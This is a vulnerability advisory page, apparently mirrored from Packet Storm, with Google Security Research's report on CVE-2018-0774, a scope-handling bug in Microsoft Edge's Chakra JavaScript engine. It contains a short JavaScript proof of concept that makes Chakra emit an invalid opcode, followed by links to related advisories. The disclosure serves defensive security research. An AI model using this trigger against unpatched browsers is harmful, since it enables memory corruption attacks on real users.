Lucene search
Google Security ResearchPACKETSTORM:145951HistoryJan 17, 2018 - 12:00 a.m.
Microsoft Edge Chakra Incorrect Scope Handling
2018-01-1700:00:00
Google Security Research
packetstormsecurity.com
17
0.96 High
EPSS
Percentile
99.3%
`Microsoft Edge: Chakra: Incorrect scope handling
CVE-2018-0774
PoC:
(function func(arg = function () {
print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
print(func);
function func() {
}
})();
Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Related
zdt
zdt
Microsoft Edge Chakra - Incorrect Scope Handling Exploit
2018-01-18 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2018-01-03 08:00:00
symantec
symantec
seebug
seebug
Microsoft Edge: Chakra: Incorrect scope handling(CVE-2018-0774)
2018-01-22 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-0774)
2018-01-04 00:00:00
veracode
veracode
Remote Code Execution (RCE)
2018-07-05 01:12:57
Remote Code Execution (RCE)
2018-07-05 03:03:14
Remote Code Execution (RCE)
2018-07-04 08:29:06
prion
prion
Memory corruption
2018-01-04 14:29:00
Memory corruption
2018-01-04 14:29:00
Memory corruption
2018-01-04 14:29:00
osv
osv
cve
cve
kaspersky
kaspersky
KLA11166 Multiple vunlerabilities in Microsoft Browsers
2018-01-03 00:00:00
mskb
mskb
January 3, 2018âKB4056892 (OS Build 16299.192)
2018-01-09 08:00:00
nessus
nessus
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4056892)
2018-01-04 00:00:00
talosblog
talosblog
Microsoft Patch Tuesday - January 2018
2018-01-09 13:36:00
trendmicroblog
trendmicroblog